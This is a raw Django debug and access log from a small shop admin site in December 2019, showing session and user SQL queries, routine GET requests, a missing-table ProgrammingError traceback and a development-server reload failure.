('36knw7s76yvnckkjz2p62a9dju8w7tsl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-19T05:22:21.663381+00:00'::timestamptz); args=('36knw7s76yvnckkjz2p62a9dju8w7tsl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 19, 5, 22, 21, 663381, tzinfo=)) [05/Dec/2019 05:22:21] "GET /login/?next=/ HTTP/1.0" 200 1786 [05/Dec/2019 05:25:13] "GET / HTTP/1.0" 302 0 [05/Dec/2019 05:30:15] "GET / HTTP/1.0" 302 0 [05/Dec/2019 05:35:57] "GET / HTTP/1.0" 302 0 [05/Dec/2019 05:36:45] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 05:37:15,311 utils 9489 140436153108224 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T05:37:15.299238+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 5, 5, 37, 15, 299238, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-05 05:37:15,315 utils 9489 140436153108224 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 05:37:15,387 utils 9489 140436153108224 (0.004) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T05:37:15.382721+00:00'::timestamptz WHERE "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 5, 37, 15, 382721, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') [05/Dec/2019 05:37:15] "GET /shop/category/add/ HTTP/1.0" 200 4645 DEBUG 2019-12-05 05:37:16,835 utils 9489 140436153108224 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T05:37:16.826362+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 5, 5, 37, 16, 826362, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-05 05:37:16,837 utils 9489 140436153108224 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [05/Dec/2019 05:37:16] "GET /jsi18n/ HTTP/1.0" 200 3223 Not Found: /favicon.ico [05/Dec/2019 05:37:19] "GET /favicon.ico HTTP/1.0" 404 6411 [05/Dec/2019 05:42:07] "GET / HTTP/1.0" 302 0 [05/Dec/2019 05:47:10] "GET / HTTP/1.0" 302 0 [05/Dec/2019 05:52:12] "GET / HTTP/1.0" 302 0 [05/Dec/2019 05:57:15] "GET / HTTP/1.0" 302 0 [05/Dec/2019 06:05:03] "GET / HTTP/1.0" 302 0 [05/Dec/2019 06:10:05] "GET / HTTP/1.0" 302 0 [05/Dec/2019 06:15:08] "GET / HTTP/1.0" 302 0 [05/Dec/2019 06:20:10] "GET / HTTP/1.0" 302 0 [05/Dec/2019 06:25:13] "GET / HTTP/1.0" 302 0 [05/Dec/2019 06:30:16] "GET / HTTP/1.0" 302 0 [05/Dec/2019 06:37:37] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [05/Dec/2019 06:39:20] "GET /robots.txt HTTP/1.0" 404 6406 [05/Dec/2019 06:39:28] "GET / HTTP/1.0" 302 0 [05/Dec/2019 06:46:48] "GET / HTTP/1.0" 302 0 [05/Dec/2019 06:51:50] "GET / HTTP/1.0" 302 0 [05/Dec/2019 06:56:53] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 07:04:02,323 utils 9489 140436153108224 (0.007) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T07:04:02.309808+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 7, 4, 2, 309808, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 07:04:02,329 utils 9489 140436153108224 (0.004) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 07:04:02,368 utils 9489 140436153108224 (0.006) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-05 07:04:02,374 utils 9489 140436153108224 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T07:04:02.371579+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 7, 4, 2, 371579, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 07:04:02] "GET / HTTP/1.0" 200 6019 DEBUG 2019-12-05 07:04:06,618 utils 9489 140436153108224 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T07:04:06.608285+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 7, 4, 6, 608285, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 07:04:06,621 utils 9489 140436153108224 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 07:04:06,623 utils 9489 140436153108224 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-05 07:04:06,676 utils 9489 140436153108224 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC, "shop_category"."id" DESC LIMIT 21; args=() DEBUG 2019-12-05 07:04:06,678 utils 9489 140436153108224 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC, "shop_category"."id" DESC LIMIT 21; args=() Internal Server Error: /shop/category/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "shop_category" ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 606, in wrapper return self.admin_site.admin_view(view)(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/views/decorators/cache.py", line 44, in _wrapped_view_func response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/sites.py", line 223, in inner return view(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 45, in _wrapper return bound_method(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/decorators.py", line 142, in _wrapped_view response = view_func(request, *args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 1672, in changelist_view cl = self.get_changelist_instance(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/options.py", line 744, in get_changelist_instance sortable_by, File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 82, in __init__ self.get_results(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/contrib/admin/views/main.py", line 210, in get_results result_count = paginator.count File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/functional.py", line 80, in __get__ res = instance.__dict__[self.name] = self.func(instance) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/paginator.py", line 91, in count return c() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 392, in count return self.query.get_count(using=self.db) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 504, in get_count number = obj.get_aggregation(using, ['__count'])['__count'] File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/query.py", line 489, in get_aggregation result = compiler.execute_sql(SINGLE) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: SELECT COUNT(*) AS "__count" FROM "shop_category" ^ [05/Dec/2019 07:04:06] "GET /shop/category/ HTTP/1.0" 500 174443 [05/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 [05/Dec/2019 07:10:05] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [05/Dec/2019 07:13:41] "GET /robots.txt HTTP/1.0" 404 6405 [05/Dec/2019 07:13:41] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 07:13:42,440 utils 9489 140436153108224 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'm7mbyt6csuihj1y9zvft1i7x7zjqj3tw' LIMIT 1; args=('m7mbyt6csuihj1y9zvft1i7x7zjqj3tw',) DEBUG 2019-12-05 07:13:42,443 utils 9489 140436153108224 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('m7mbyt6csuihj1y9zvft1i7x7zjqj3tw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-19T07:13:42.441416+00:00'::timestamptz); args=('m7mbyt6csuihj1y9zvft1i7x7zjqj3tw', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 19, 7, 13, 42, 441416, tzinfo=)) [05/Dec/2019 07:13:42] "GET /login/?next=/ HTTP/1.0" 200 1786 [05/Dec/2019 07:13:45] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [05/Dec/2019 07:13:46] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [05/Dec/2019 07:13:46] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [05/Dec/2019 07:13:47] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [05/Dec/2019 07:15:08] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/shop/models.py changed, reloading. Performing system checks... December 04, 2019 - 13:16:39 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Traceback (most recent call last): File "manage.py", line 22, in execute_from_command_line(sys.argv) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 381, in execute_from_command_line File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/__init__.py", line 375, in execute File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/base.py", line 323, in run_from_argv File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 60, in execute File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/base.py", line 364, in execute File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 95, in handle File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/management/commands/runserver.py", line 102, in run File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 600, in run_with_reloader File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/autoreload.py", line 225, in restart_with_reloader File "/usr/local/lib/python3.6/subprocess.py", line 267, in call with Popen(*popenargs, **kwargs) as p: File "/usr/local/lib/python3.6/subprocess.py", line 709, in __init__ restore_signals, start_new_session) File "/usr/local/lib/python3.6/subprocess.py", line 1344, in _execute_child raise child_exception_type(errno_num, err_msg, err_filename) FileNotFoundError: [Errno 2] No such file or directory: '/home/resfx/public_html/admin.resfx.com/backend/venv_name/bin/python': '/home/resfx/public_html/admin.resfx.com/backend/venv_name/bin/python' Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-05 07:45:28,623 utils 25067 140223433287424 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-05 07:45:28,628 utils 25067 140223433287424 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-05 07:46:24,854 utils 25067 140223400105728 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T07:46:24.842838+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 5, 7, 46, 24, 842838, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-05 07:46:24,858 utils 25067 140223400105728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 07:46:24,963 utils 25067 140223400105728 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-05 07:46:24,967 utils 25067 140223400105728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T07:46:24.965357+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 7, 46, 24, 965357, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [05/Dec/2019 07:46:24] "GET / HTTP/1.0" 200 6019 DEBUG 2019-12-05 07:46:48,528 utils 25067 140223400105728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T07:46:48.519539+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 5, 7, 46, 48, 519539, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-05 07:46:48,530 utils 25067 140223400105728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 07:46:48,560 utils 25067 140223400105728 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-05 07:46:48,562 utils 25067 140223400105728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T07:46:48.561395+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 7, 46, 48, 561395, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [05/Dec/2019 07:46:48] "GET / HTTP/1.0" 200 6019 [05/Dec/2019 07:47:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-05 07:48:22,908 utils 25067 140223400105728 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T07:48:22.897666+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 5, 7, 48, 22, 897666, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-05 07:48:22,910 utils 25067 140223400105728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-05 07:48:22,943 utils 25067 140223400105728 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-05 07:48:22,950 utils 25067 140223400105728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-19T07:48:22.947279+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 19, 7, 48, 22, 947279, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [05/Dec/2019 07:48:22] "GET / HTTP/1.0" 200 6019 DEBUG 2019-12-05 07:48:29,145 utils 25067 140223400105728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-05T07:48:29.134670+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 5, 7, 48, 29, 134670, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-05 07:48:29,148 utils 25067 140223400105728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", 